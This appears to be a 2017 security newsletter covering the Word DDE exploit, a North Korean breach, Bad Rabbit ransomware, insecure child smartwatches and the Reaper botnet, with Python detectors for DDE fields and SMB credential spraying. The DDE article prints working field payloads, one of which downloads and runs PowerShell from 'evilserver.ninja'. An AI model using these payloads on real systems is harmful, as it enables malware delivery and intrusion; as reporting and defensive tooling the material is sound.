Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability in Microsoft Office's Dynamic Data Exchange (DDE) protocol. Exploiting it requires "no macros or memory corruption", the security warning Word would normally raise can be suppressed with the right field syntax, and antivirus software does not flag the document. Thousands of applications use the DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, either once or whenever new data becomes available. For example, one could use DDE to target a cell in Excel and receive an update whenever that cell is edited, keeping a cell in your own workbook in sync with the cell in the original document.

The Sensepost blog post focuses on using Microsoft Word and DDE to obtain command execution without detection. The exploit is built by inserting a field into a Word document (the empty field initially renders as an error message) and then editing the field code so that it reads something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

In short, you tell Word to execute an automatically updating DDE field, and that field launches the command prompt, which in turn runs your payload. In the proof-of-concept demonstration, the payload was a PowerShell command that launched an Empire stager.

Whenever the Word document is opened, Word first asks for permission to update the document with data from linked files; for anyone who works with DDE this is nothing unusual. A second prompt, a security warning raised because the DDE field is starting the command prompt, normally follows, but according to the blog it can be hidden with "proper syntax modification". After that, all you need is to get the Word file onto the target system, have the target open it, and have them click OK on the one remaining prompt to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, reproduced it, and decided that it is a feature working as intended, so it will not be patched any time soon. Microsoft has instead released Security Advisory 4053440 on securely opening Office documents that contain DDE fields; its guidance mostly involves the user changing settings through the Registry Editor, which, if done incorrectly, can break the machine badly enough to require reinstalling the operating system.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been used by the hacking group "Fancy Bear", which is believed to be affiliated with the Russian government. In recent weeks they have run a spear-phishing campaign themed around the New York terror attack to bait users into opening the malicious documents and infecting their systems with malware. The technique has also been used in various forms against several other organizations and companies.

Because DDE is a legitimate Office feature rather than the exploitation of a bug, nothing in Office itself stops a DDE field from running whatever command is written into it. One way to protect yourself is to disable DDE entirely on your machines. You can also follow Microsoft's advisory, which uses the Registry Editor to stop Office applications from updating links automatically, or go into the settings of the individual applications that use DDE and turn off automatic updating and receiving updates from other DDE applications. As always, don't click links or download attachments from email unless you are certain the source is safe.
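For the defender's side of this, here is an added example (not code from Sensepost, Microsoft, or the original post) that scans a .docx for DDE/DDEAUTO fields the way a mail gateway or incident responder might. A .docx is a ZIP container of XML parts, and Word splits a field's instruction across several runs, so the scanner reassembles each field before matching. The sample document it builds is constructed here for the demonstration; the part names and namespace are the standard OOXML ones.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET  # prefer defusedxml in production: the XML is attacker-controlled

# Standard WordprocessingML namespace used by every .docx part under word/.
W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# A field instruction that starts with DDE or DDEAUTO (case-insensitive).
DDE_RE = re.compile(r"^DDE(AUTO)?\b", re.IGNORECASE)


def iter_field_instructions(root):
    """Yield the complete instruction string of every field in one XML part.

    Word stores a complex field as a sequence of runs: a fldChar begin, one or
    more instrText runs holding pieces of the instruction, an optional fldChar
    separate followed by the cached result, and a fldChar end. Fields may nest,
    so a stack collects instrText pieces per open field. Simple fields carry
    their instruction in a w:instr attribute instead.
    """
    open_fields = []
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                open_fields.append([])
            elif kind == "end" and open_fields:
                yield "".join(open_fields.pop())
        elif el.tag == W + "instrText" and open_fields:
            open_fields[-1].append(el.text or "")
        elif el.tag == W + "fldSimple":
            yield el.get(W + "instr", "")


def find_dde_fields(docx_bytes):
    """Return [(part_name, normalized_instruction)] for every DDE field found.

    Every XML part under word/ is inspected (body, headers, footers, footnotes,
    comments), not just document.xml, because a field in a header updates
    exactly like one in the body.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed part; Word would reject it too
            for instr in iter_field_instructions(root):
                normalized = " ".join(instr.split())  # collapse whitespace and newlines
                if DDE_RE.match(normalized):
                    hits.append((name, normalized))
    return hits


# Constructed sample, not a real malicious document: a minimal .docx whose body
# holds a harmless PAGE field and one DDEAUTO field whose instruction is split
# across two instrText runs, as Word itself serializes fields.
CONTENT_TYPES_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
<Default Extension="xml" ContentType="application/xml"/>
<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
</Types>"""

SAMPLE_DOCUMENT_XML = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:body>
<w:p><w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>
<w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">AUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>!Unexpected End of Formula</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
</w:body>
</w:document>"""


def build_sample_docx():
    """Pack the constructed parts into an in-memory .docx (a ZIP container)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES_XML)
        zf.writestr("word/document.xml", SAMPLE_DOCUMENT_XML)
    return buf.getvalue()


if __name__ == "__main__":
    # Scan the files named on the command line, or the built-in sample.
    blobs = [open(p, "rb").read() for p in sys.argv[1:]] or [build_sample_docx()]
    for blob in blobs:
        for part, instr in find_dde_fields(blob):
            print(f"DDE field in {part}: {instr}")
```

Treat a hit as one signal, not a verdict: the scanner covers the XML-based .docx only (the legacy binary .doc format needs a different parser), and an author who hides the DDE keyword itself, for instance by assembling it from QUOTE fields, will slip past the regex even though the reassembly across runs catches the simple split shown in the sample.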


Daniel Szafran


Article Sources:

Macro-less Code Exec in MSWord (Sensepost; contains the demo and proof of concept for the exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440


North Korea Hackers Accused of Stealing Secret Blueprints of South Korea’s Submarine Weapon Systems



North Korean hackers have allegedly broken into computer systems in South Korea and stolen classified documents containing blueprints for submarines and warships. According to South Korean politician Kyeong Dae-soo, they illegally accessed the systems of Daewoo Shipbuilding and stole around 40,000 documents, sixty of them "classified documents including blueprints and technical data for submarines and vessels equipped with Aegis weapon systems".

The breach was discovered by the South Korean defense ministry, according to Kyeong Dae-soo of the main opposition Liberty Korea Party. "We are almost 100 percent certain that North Korean hackers were behind the hacking and stole the company's sensitive documents," Kyeong told Reuters. The team investigating the hack concluded that North Korea was responsible after reportedly uncovering similarities with other attacks known to have been conducted by North Korean hackers.

North Korea is also in the middle of building a brand-new submarine that could potentially launch nuclear missiles: US intelligence assesses that it has begun construction of a new class of 2,000-ton submarine which Kim Jong-un could use to launch the country's nuclear missiles. Its existence has not been confirmed yet, but US intelligence sources are closely monitoring the country's shipyards to get an idea of what is happening.






-Matthew Brown

New Ransomware Spreads across Europe

A new ransomware, dubbed "Bad Rabbit", spread quickly through Europe in late October. The Petya-like attack (27% of the Bad Rabbit code has been seen in Petya samples) struck corporate and personal networks alike using "drive-by" download attacks. An initial analysis by Kaspersky Lab states that the malware spreads by luring victims with fake Adobe Flash Player installers, meaning that no exploit was used to deliver the malware: the victim must manually execute the dropper.

Once executed, Bad Rabbit scans the internal network for open SMB (Server Message Block) shares and tries a hardcoded list of commonly used credentials to spread the ransomware. It also uses the post-exploitation tool Mimikatz to extract credentials from the infected system. This is notable because it marks a new wave of ransomware that does not rely on the "EternalBlue" exploit used by WannaCry and Petya to spread through networks (later analysis by Cisco Talos found that Bad Rabbit does use the related EternalRomance SMB exploit for lateral movement). The same report also stated that numerous compromised websites had been detected, "all of which were news or media websites."
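To make that spreading behaviour concrete from the defender's side, here is an added example (not from Kaspersky's report or the original post) that runs over a constructed handful of Windows Security log records and flags a host walking a credential list across SMB shares. The log format, host names, IP addresses and usernames are all made up for the demonstration; the event IDs (4625 failed logon, 4624 successful logon) and logon type 3 (network logon) are the real Windows values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry), one per line:
# "<timestamp> <event_id> <source_ip> <target_host> <account> <logon_type>"
# Event 4625 is a failed logon and 4624 a successful one; logon type 3 is a
# network logon, which is what an SMB session authenticated with supplied
# credentials produces on the target host. 10.0.0.9 is a user who mistypes a
# password twice; 10.0.0.5 is a host trying a short list of usernames against
# every share it can reach, and eventually getting in with one of them.
SAMPLE_EVENTS = [
    "2017-10-24T12:00:01 4625 10.0.0.9 FS01 jsmith 3",
    "2017-10-24T12:00:09 4625 10.0.0.9 FS01 jsmith 3",
    "2017-10-24T12:00:15 4624 10.0.0.9 FS01 jsmith 3",
    "2017-10-24T12:03:00 4625 10.0.0.5 FS01 Administrator 3",
    "2017-10-24T12:03:00 4625 10.0.0.5 FS01 Admin 3",
    "2017-10-24T12:03:01 4625 10.0.0.5 FS01 Guest 3",
    "2017-10-24T12:03:01 4625 10.0.0.5 FS01 User 3",
    "2017-10-24T12:03:02 4625 10.0.0.5 FS01 root 3",
    "2017-10-24T12:03:02 4625 10.0.0.5 FS01 backup 3",
    "2017-10-24T12:03:05 4625 10.0.0.5 FS02 Administrator 3",
    "2017-10-24T12:03:05 4625 10.0.0.5 FS02 Admin 3",
    "2017-10-24T12:03:06 4625 10.0.0.5 FS02 Guest 3",
    "2017-10-24T12:03:07 4624 10.0.0.5 FS02 backup 3",
    "2017-10-24T12:03:10 4625 10.0.0.5 PRINT01 Administrator 3",
    "2017-10-24T12:03:10 4625 10.0.0.5 PRINT01 Admin 3",
    "2017-10-24T12:03:11 4625 10.0.0.5 PRINT01 root 3",
]


def parse_event(line):
    """Split one constructed record into a dict with typed fields."""
    ts, event_id, src, target, account, logon_type = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "event_id": int(event_id),
        "src": src,
        "target": target,
        "account": account,
        "logon_type": int(logon_type),
    }


def detect_credential_spray(lines, window=timedelta(minutes=5),
                            min_accounts=5, min_targets=3):
    """Flag source hosts that, inside one `window`, failed network logons with
    at least `min_accounts` distinct usernames against at least `min_targets`
    distinct hosts. A single user fat-fingering a password never trips this;
    a worm iterating a hardcoded credential list across SMB shares does.

    Returns {source_ip: {"accounts": set, "targets": set, "successes": set}}
    where "successes" are the (host, account) pairs the source logged into
    after the spray started, i.e. where it most likely moved to next.
    """
    events = sorted((parse_event(ln) for ln in lines), key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3 and e["event_id"] in (4624, 4625):
            by_src[e["src"]].append(e)

    alerts = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["event_id"] == 4625]
        start = 0
        for end in range(len(failures)):
            # Slide the window so it spans at most `window` of wall-clock time.
            while failures[end]["ts"] - failures[start]["ts"] > window:
                start += 1
            win = failures[start:end + 1]
            accounts = {e["account"] for e in win}
            targets = {e["target"] for e in win}
            if len(accounts) >= min_accounts and len(targets) >= min_targets:
                successes = {(e["target"], e["account"]) for e in evs
                             if e["event_id"] == 4624 and e["ts"] >= win[0]["ts"]}
                alerts[src] = {"accounts": accounts, "targets": targets,
                               "successes": successes}
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for src, info in detect_credential_spray(SAMPLE_EVENTS).items():
        print(f"{src}: {len(info['accounts'])} usernames x "
              f"{len(info['targets'])} hosts; got in at {sorted(info['successes'])}")
```

The thresholds are deliberately loose and should be tuned to the environment. Note the blind spot: credentials harvested with Mimikatz work on the first try and leave no 4625 trail at all, so pair this with an alert on one workstation successfully logging into many hosts over the network in a short period.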

After spreading through a network, Bad Rabbit uses the open-source full-disk encryption tool DiskCryptor to encrypt the disk; individual files are encrypted with AES, and the AES key is in turn encrypted with the attackers' RSA-2048 public key. A ransom note then appears on the screen asking the victim to log into an onion website and make an initial payment of 0.05 bitcoin (roughly $285) for the decryption key. A countdown timer, initially set to about 40 hours, is also displayed, with the threat that the price will rise if no payment is made within that time.



Affected organizations include the Russian news agencies Interfax and Fontanka as well as the payment systems of the Kiev Metro, Odessa International Airport, and the Ukrainian Ministry of Infrastructure. Interfax was hit particularly hard: 24 hours after the attack its website still displayed the message "our service is temporarily unavailable."

Ilya Sachkov, head of the Russian cyber-security firm Group-IB, says, "In some of the companies, the work has been completely paralyzed – servers and workstations are encrypted." U.S. officials have stated that they have "received numerous reports of BadRabbit ransomware infections in many countries around the world." The Russian central bank released a statement that Bad Rabbit attacks had been recorded against several of the top 20 Russian financial institutions, but that none had been compromised.

So far, attacks have been heavily concentrated in Russia, but they have also been recorded in Ukraine, Turkey, and Germany. Analysis of Bad Rabbit is still under way, both to find a way to decrypt affected computers without paying and to stop it spreading further.

The malware is still undetected by the majority of anti-virus programs, according to VirusTotal. For now, Kaspersky Lab suggests disabling the WMI service on your computers to prevent the malware from spreading across your network, and changing any default credentials in use on it.






Smartwatches designed for children have become a target for hackers.

Smartwatches are becoming more and more popular with the general population, and even young children are starting to wear them. In theory this sounds like a good idea: the watches give a parent a way to see where their young child is and to communicate with them if need be, and they give the child a way to quickly call their parents in an emergency. This all sounds good until you realize that a hacker who gets into the watch can do the same things.

The Norwegian Consumer Council tested some of these watches and found that some transmitted GPS data without encryption. This allows an attacker with basic tools to get into the watch and track the movements of the child wearing it, an incredibly dangerous problem. The attacker could also spoof the location to make it look like the child is somewhere completely different. The Council also found that an attacker could communicate with the child and eavesdrop on the conversations the child has with others through the watch. Thankfully, many of the companies that design and produce the watches have recalled them and started to fix the problems and make them more secure.

-Levi Walker




Reaper Botnet Dwarfs Mirai


By this point everyone and their mother has heard of the botnet dubbed 'Mirai', the infamous botnet from last year that managed to take down a good chunk of the internet by attacking the DNS provider Dyn. As of this September, weak passwords might have become the least of your worries if, like 60% of the corporate networks covered by Check Point's ThreatCloud, you have unpatched vulnerabilities on your network.

Dubbed Reaper, or IoTroop by some, a new IoT botnet is propagating and shows no sign of slowing down. Reaper borrows some code from Mirai, but its intrusion and propagation techniques are a clear step up. Whereas Mirai spread by exploiting default passwords on IoT devices, Reaper carries exploits for a set of well-known vulnerabilities in popular routers and IP cameras, uses them to gain entry to a device, and then uses that device to spread itself to others it can reach.

Growth has been near exponential: Qihoo 360 Netlab saw roughly 2 million vulnerable devices queued at a single C&C server waiting to be processed, and several C&C servers have been identified so far. The best thing any concerned corporation or user can do at this point is to make sure every device on their network has up-to-date firmware and software, to limit the spread of this plague infecting IoT networks worldwide.

Currently it looks like the calm before the storm, with the botnet ramping up massively in numbers and, according to Check Point, updating its capabilities daily. What else can I say but stay safe and brace for impact: when this thing hits, it'll make the Dyn attack look like a birthday party.

– Kenneth Nero
